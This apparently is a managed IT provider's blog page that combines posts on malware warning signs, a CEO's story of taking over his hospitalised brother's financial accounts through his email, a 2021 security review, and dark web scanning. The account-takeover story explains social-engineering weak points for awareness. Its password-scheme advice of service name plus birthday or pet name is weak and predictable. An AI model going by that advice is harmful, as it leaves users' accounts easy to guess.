Signs That Your Computer May Be Infected with Malware

Approximately 34% of businesses take a week or longer to regain access to their data and systems once hit with a malware attack. Malware is an umbrella term that encompasses many different types of malicious code. It can include:

  • Viruses
  • Ransomware
  • Spyware
  • Trojans
  • Adware
  • Key loggers
  • And more

The longer that malware sits on your system unchecked, the more damage it can do. Most forms of malware have a directive built in to spread to as many systems as possible. So, if not caught and removed right away, one computer could end up infecting 10 more on the same network in no time.

Early detection is key so you can disconnect an infected device from your network and have it properly cleaned by a professional.

Keep an eye out for these key warning signs of malware infection so you can jump into action and reduce your risk.

STRANGE POPUPS ON YOUR DESKTOP

Some forms of malware can take on the disguise of being an antivirus app or warranty notice that pops up on your screen. Hackers try to mimic things that users may have seen from a legitimate program, so they’ll be more apt to click without thinking. If you begin to see a strange “renew your antivirus” subscription alert or a warranty renewal that doesn’t quite make sense, these could be signs that your PC has been infected with adware or another type of malware.

NEW SLUGGISH BEHAVIOR

Computers can become sluggish for a number of reasons, including having too many browser tabs open at once or running a memory-intensive program. But you’ll typically know your computer and the types of things that slow it down.

If you notice new sluggish behavior that is out of the ordinary, this could be an infection. One example would be if you don’t have any programs open except notepad or another simple app, and yet you experience freezing.

When malware is running in the background, it can often eat up system resources and cause your system to get sluggish.

APPLICATIONS START CRASHING

Applications should not just crash out of the blue. There is always a reason. Either the software is faulty, there’s been an issue with an update, or something else may be messing with that application’s files.

If you suddenly experience apps crashing, requiring you to restart the app or reboot your system, this is another telltale sign that a virus, trojan, or other malicious code has been introduced.

YOUR BROWSER HOME PAGE IS REDIRECTED

If you open your browser and land on a homepage that is not the one you normally see, have your PC scanned for malware right away. Redirecting a home page is a common ploy of certain types of malware.

The malware will infect your system and change the system setting for your default browser home page. This may lead you to a site filled with popup ads or to another type of phishing site.

Just trying to change your homepage back in your settings won’t fix the situation. It’s important to have the malware removed.

SUDDEN REBOOTS

Another annoying trait of certain types of malicious code is to make your system reboot without warning.

This can cause you to lose the work you’ve just done and can make it difficult to get anything done. This may happen when malware is changing core system files behind the scenes. With files corrupted, your system becomes unstable and can often reboot unexpectedly.

YOU’RE MISSING HARD DRIVE SPACE

If you find that a good deal of your hard drive space that used to be open is now gone, it could be a malware infection taking up your space. Some types of malware may make copies of files or introduce new files into your system.

They will cleverly hide, so don’t expect to see the word “malware” on a file search. Instead, the dangerous activities will usually be masked by a generic-sounding name that you mistake for a normal system file.

YOU RUN ACROSS CORRUPTED FILES

If you open a file and find it corrupted, this could be a red flag that ransomware or another form of malware has infected your system.

While files can occasionally become corrupt for other reasons, this is a serious issue that deserves a thorough malware scan if you see it.

PC “PROCESSING SOUNDS” WHEN THERE SHOULDN’T BE

Most of us are familiar with those “thinking sounds” when our computer is processing something memory intensive. You’ll usually hear a type of whirring that will go away once you finish that activity.

If you begin hearing this processing sound when you’re not doing anything particularly intense on your computer, this could be a sign that malware is running in the background and it should be checked out.

GET EXPERT MALWARE SCANNING & REMOVAL

Free online malware and virus scans aren’t very reliable. Instead, come to a professional that can ensure your entire system is cleaned properly.

Article used with permission from The Technology Press.

Email Security Hits Home For CEO, Mike Kupfer

How I Stole Everything From My Brother While He Was Laid up In A Texas Hospital ICU. 

Ok first off, while the rest of this story will be a true story about my personal experience with handling by brother’s financial life over the past 6 months, the title is…well, a bit of click bait. In fact, it should be titled “How I COULD have stolen everything from my brother while he was laid up in the burn ICU.”

In fact, as my mother’s favorite child and a good brother, all actions taken with my access to his financials were to his benefit. However, had a “bad actor” had received even the small amount of credentials I had been given; they could have wreaked a lot of havoc on my brother. Honestly, with much more ease than I would have ever expected, and I have been around IT security for years.

On July 19, 2021, my brother was in a terrible accident. A house fire from which he honestly had no business surviving. The first day we got to the hospital, we were told that if he was to survive, we should expect an extended stay in the burn ICU. We were told to expect months.

While his health was of the utmost importance in those first couple of weeks, I did know that his laptop, wallet, and phone had been left at the site of the fire, and since the home was left pretty much unsecured, it probably made sense to make sure my brother’s credit was locked with the credit agencies and his financial accounts were monitored.

Every week or 10 days there would be a day or two that my brother was able to communicate, although admittedly not very well. When the first of those days came. I was able to ask him his login and password for his Yahoo email account, his main email. He struggled to remember the exact password, but after a few guesses I had access to his account.

The rest of this story should be read as a cautionary tale that someone even with simple e-mail credentials cause great harm. You might think all of your vendors make it difficult to hijack your account, I did. While managing my brother’s finances, I found out this is not always the case. Here are some of the “cracks” I discovered with the different types of institutions.

Credit Agencies

This was the first place I called were the credit agencies to put a stop on any attempts to run a credit report in his name. Remember, at this point I don’t have official power of attorney because he has yet to have a fully coherent enough day to do paperwork. (Nor the use of his hands to even hold a pen)

I started with the credit agencies, and these were the only companies where I said that I WAS my brother. Since I had his social security number, his birthday, and access to his email, I figured I could pull it off. For the most part I did, but to their credit, they asked me a handful of questions specific to his credit in addition to the traditional credentials. For instance, they asked which of the following streets had he lived on in the past 10 years and offered multiple choice. These questions I would not likely had known, and my cover would have been blown. However, my niece was sitting next to me, and SHE knew the answers to these questions. 1st MISSION ACCOMPLISHED we got access and were able to put a freeze on his credit.

It taught me something though. Getting access to his banks and credit cards might not be so easy even with his information. I decided moving forward that I would always come clean and tell the customer service people I was calling that I was in fact Mike, and I was calling on behalf of my brother, but had all needed information. This is when things began to get interesting, and a bit scary.

Credit Cards

My brother had a lot of credit cards. He liked to have a couple he would use for expenses and getting points etc., and others with small limits that he used once a month and paid them off just to get his credit rating

boosted. There were some differences in how these banks dealt with my requests to get online access so that I could manage my brother’s account. Mostly secured the account with basic UN and Password, and email as a 2nd form of authentication. Since his email was almost always his username, all I needed to do was request a new password and the system would send a new “reset password” link to my brother’s email, which I had access to. Bottom line- on most of these accounts, having nothing more than a story and email access, I was able to take over access to his credit cards as if I was him.

Cell Phone

This was my favorite. I did not have a login or password. I called in and told the customer service rep that I was calling on behalf of my brother and looking to get access so that I could replace his phone for him. (I actually needed this because some companies with stronger procedures required his cell phone for the second authenticator and not his email) They did ask if I had his PIN, which I literally guessed. He CONFIRMED that was the PIN. However, he insisted that he “get approval” directly from my brother. So even though I explained that my brother was in the hospital and getting him on the phone was not an easy task, they made me get him on the phone and give a verbal ok to allow me on his account. Even though my brother was not able to remember his pin, because the service manager had confirmed it with me, I was able to text it to my brother’s nurse and tell him to give that PIN. This seems like a decent policy, but honestly, I could have had him call me on a different phone line or an accomplice, so it seemed kind of stupid to require speaking with my brother. At least I was not just able to talk my way into a representative changing security protocol.

Banks

Banks were also an interesting bunch. My brother banked with 2 banks. One of which I was getting nowhere with until I had full Power of Attorney. So, from a security standpoint they were solid. The other bank was one that my brother had a relationship with. He would like to go into the banks and talk to people. That is just how my brother is. When I called them and tried to get access to his accounts, I was amazed at just how close a relationship could have become a security breach had I been a bad actor. Basically, when I called the bank, they had heard about this fire and when I told them it was my brother’s home, they were very eager to help in any way. They did have their security protocols but since they knew my brother, I had them looking into how I could get access to his online accounts. At one point, I was told that when the teller who knew my brother came back from lunch, she would call me, and I could put my brother on the phone so he could give a verbal approval of my access. If that teller “felt comfortable” with the person on the other end of the line “was in fact my brother” then I could have the access. I was shocked but wanted the access. So, I kept my mouth shut. When the branch manager did call me back, they told me this would not work. NOT because it was a security risk, but because at that branch, they did not have the ability to record calls, and so there could be no record. So, they inadvertently avoided basically giving me accesses and probably breaking bank security protocol.

Financial/Crypto Currency Account

When it came to gaining access to my brother’s crypto currency account, the security was solid. Perhaps to solid. I had to jump through so many hoops (with very little customer service help but via email) that it literally took me over a month, and a physical trip to my brother in Dallas to finally gain access. My advice on these types of accounts is not so much about how to improve your security, but rather make sure you UNDERSTAND their policies and prepare for another party to be able to get access if needed. This account was one of the most important that we get into as it had a majority of his available funds, yet it took me almost a month to get access because their security is so tight and not really set up for an emergency like the one my brother was in. If you have money in a particular account, make sure you know their access policy and prepare for that. There were literally days I thought I might never get into this account for my brother. I don’t mean that figuratively.

CONCLUSIONS

  • FIRST AND FOREMOST – PROTECT YOUR EMAIL CREDENTIALS!!!

So many companies use email as the main way to verify a request for a new password. If a bad actor has this data, they can call every vendor, bank, credit card, or personal contacts and see if having those credentials can get them other more private credentials. What I found out with this experience is they can, and not with much more effort than requesting a new password and then locking you out. Having a managed IT provider in Chicago take a look at your email protection status is a great idea.

  • DON’T USE THE SAME PASSWORD OR PIN NUMBERS FOR MULTIPLE VENDORS

How was I able to “Guess” my brother’s cell pin? Easy. I know he is a Cubs fan and he had used a couple of Cubs player numbers as his 4-digit code. He had used the same code with another vendor I had earlier gained access to and so I had a good idea this would be the same and BAM- It was. If you MUST use similar passwords for convenience, use a password scheme that is easy to remember but would make each site unique. For instance:

  • The name of the service, followed by
  • Your birthday followed by
  • A dollar sign

So that your login to Amazon might be (if your b-day was March 25th) Amazon0325$. Then on your Life Insurance website it could be Insurance0325$, and so on. Pro tip on this idea, use tiers of difficulty in your password schemes so that lets say the sample above would be good for all less threatening websites, but use a more difficult scheme for your financial and banking sites. Things you FOR SURE do not want people to get into. For those you might do something like:

  • The service name, followed by
  • Your mom’s full birthday, followed by
  • Your dog’s name, followed by
  • Two #.

So that might look something like Banking062938Fido##. MUCH more challenging to crack by man or machine.

  • KNOW THE REQUIREMENTS FOR ACCESS FOR ANY VENDOR FINANCIAL OR OTHERWISE AND PLAN FOR EASY ACCESS FOR SOMEONE BESIDES YOU.

My brother (like many people) was not fully prepared for a month’s long hospital stay. Really it is mostly the financials that can get sort of tricky, and they are likely to be more sticklers regarding security compliance (although not always). Find out what they would ask for if YOU were not able to physically get access. In my brother’s case he lost his wallet in the fire. Had I known how important a copy of his driver’s license would have been in receiving access to his crypto account, I could have made a copy and kept it in a file in my home in case of emergency. Luckily, while he was in the hospital, access to this money was not all that important, but had he needed this money sooner than “eventually” it could have been a problem since it took over a month for me to gain access.

  • IF YOUR ORGANIZATION NEEDS OUTSIDE HELP WITH SECURITY DON’T HESITATE TO PLAN FOR THIS.

No matter if you have an IT staff internally, use a Managed Services Provider (MSP), or have a combination of both similar to Black Diamond’s Co-Managed Services, make sure you are consistently planning, executing and if need be, adjusting your defense against bad actors looking to cost your organization money.

My brother is still in recovery. His doing as well as can be expected, perhaps even better than expected, which is great. He is back to handling his own credit cards and bills and has changed a couple of security habits.

I am pretty sure he is grateful his brother is an IT and cyber security consultant and not a cybercriminal. If he is not, he should be! As far as my being mom’s favorite, I think my brother and I both realize that was my sister!

2021 Year End Security Review

Photo by FLY:D on Unsplash

2021 has been an incredibly difficult year to protect your organization from cyber adversaries. It has been “The year of zero-Day exploit” with more vulnerabilities in the first 11 months of the year than ever recorded before. As we head into the end of the year and the holiday season. Black Diamond Solutions wanted to provide a few insights into the full year of zero-day events. 

  • A tough year to manage IT – Whether you have an internal IT team, use an MSP, or a combination of both, the reliance on patches alone is just not enough. In particular, In circumstances where no patch is available, it is paramount that your security stack and team is ready to monitor, detect, and provide an immediate response to the earliest signs of threat.  
  • Actions speak louder than… – Amidst the attacks of 2021, Security providers focused on rapid response and action led the charge on fighting back zero-day  vulnerabilities.  True security is more than detection and alerts – it’s about eliminating the threats so that IT teams and businesses can stay focused on their business.  
  • Long dwell times are a thing of the past– If not addressed immediately, attacks from info stealers quickly spiral out of control. Once an adversary gains initial access, their main objective is to spread their reach and malware to cause as much cost to the victim as possible. Gone are the days of long dwell times. After breach, malicious actions occur within minutes.  
  • Living off the land – Adversaries are increasingly using legitimate credentials to enter your environment. Then, using no malware at all, they ‘live off the land’. This means they leverage only native programs and tools available in the compromised environment to blend in before finally deploying their malware.  This makes detection extremely difficult for legacy tools such as anti-virus and anti-malware.

 Despite the challenges, Black Diamond Solutions appreciates your business in 2021, and we look forward to continually helping you, our clients, build and protect your IT environment in 2022.  

Our security operations center continues to offer diligent 24x7x365 managed detection and response to our security clients. We remain agile and vigilant, moving faster than the “bad actors” to keep your environment safe.  

Want to start out 2022 with a little more peace of mind regarding the security of your environment? 

Sign up for a FREE DEMO of our SOC capabilities!  

Dark Web Scanning: Security Blankets

BDS Dark Web Scanning

What is the “Dark Web”?

You probably have heard dark web scanning is a great way to prevent a data breach. But what does that even mean? The Dark Web is a part of the World Wide Web that uses darknets or overlays and is only accessible through specific software programs such as TOR browser. Unlike the surface web, the deep web is not indexed on search engines like Google and Bing. Using the Dark web, individuals on private networks can conduct business on dark web marketplaces and communicate anonymously without giving up identifying information such as location. A dark web marketplace serves as a digital black market allowing criminals to gain access of leaked data and personal information without the ability to be tracked down. Dark web sites conduct criminal activity through the sell and distribution of credit card details, medical records, passwords and other sensitive information. All being bought and sold relatively inexpensively. Worse, the information being sold, can be sold over and over again to many “dark agents” giving multiple potential hackers access to user accounts and other stolen data.

The loss of employee or company data can be devastating to an organization for multiple reasons. The costs of recovering it can be extraordinary, as well as the reputational losses if you legally or morally need to let your clients and vendors know you have experienced a breach.

This is why some organizations choose to run ongoing dark web scans for domains within their organization. Now, you might ask, “What exactly is dark web scanning?” Dark web scans are done by dark web scanners, which are tools designed to find data leaks across the entire dark web. Cyber professionals scan the dark web for full or partial amounts of sensitive information affiliated with your company’s domains and IP addresses. The types of items normally found are business usernames, personal passwords, business passwords as well as other business and personal information. By gathering information about what data is floating around the dark web your IT team or provider can easily make the needed changes both in security (changing user names or passwords for example) and company security policy (not allowing personal emails to be used for company business for example.)

Why is dark web scanning important?

Human error is one of the leading causes of data breaches, so it’s important to have layers of security in order to protect your company. A dark web scan can help you find and fix human errors before they become a problem. Additionally, cybercriminals are always looking for new ways to steal information, and not being covered on the dark web means they have the upper hand. Dark web scanners can not only monitor your company’s sensitive data but also fight against those who threaten your company’s existence!

Dark Web Scan Proactive Monitoring

Having a dark web monitoring service on a regular basis is a smart idea for the following reasons:

  • With so much now dependent on a digital world, it is a very good idea to have your company domains proactively monitored and reported on. There are simply too many credentials out there and so even a small % of stolen data can cost a company immensely.
  • By actively monitoring the dark web as it pertains to your domains and company, your IT team or provider, over time can significantly lower the amount and types of data that are getting leaked. This can be done through training of the end user as well as network settings that could restrict the types of end user activities that result in data dumps.

Comprehensive Reporting

In addition to running a dark web scan and learning about credentials on the dark web, getting a comprehensive dashboard report is a great feature of most dark web monitoring services. These reports show management data that is floating on the dark web, along with insights as to how data breaches occurred, allowing the IT team to react and set up additional security system policies and procedures based on real data. (see example report page below.)

Dark Web Scans | Final Considerations

It is pretty clear to see the benefits of dark web scanning for any organization. It is easier to fight an enemy knowing you have the upper hand than hope you can gain that upper hand back after an account takeover occurs. A trusted team of cyber security professionals can help you gain that upper hand and keep it with proactive dark web monitoring. This special software helps fight against those that threaten your company’s existence. By gathering information about your personal data floating around the dark web, and analyzing comprehensive reports with insights, your IT team is better equipped to prevent a future data breach.  If you’re concerned about this issue in your organization or want more information on dark web scanning, contact us today! We offer several security services designed to protect your personal information from leaking onto the dark web, so feel free to reach out with questions anytime!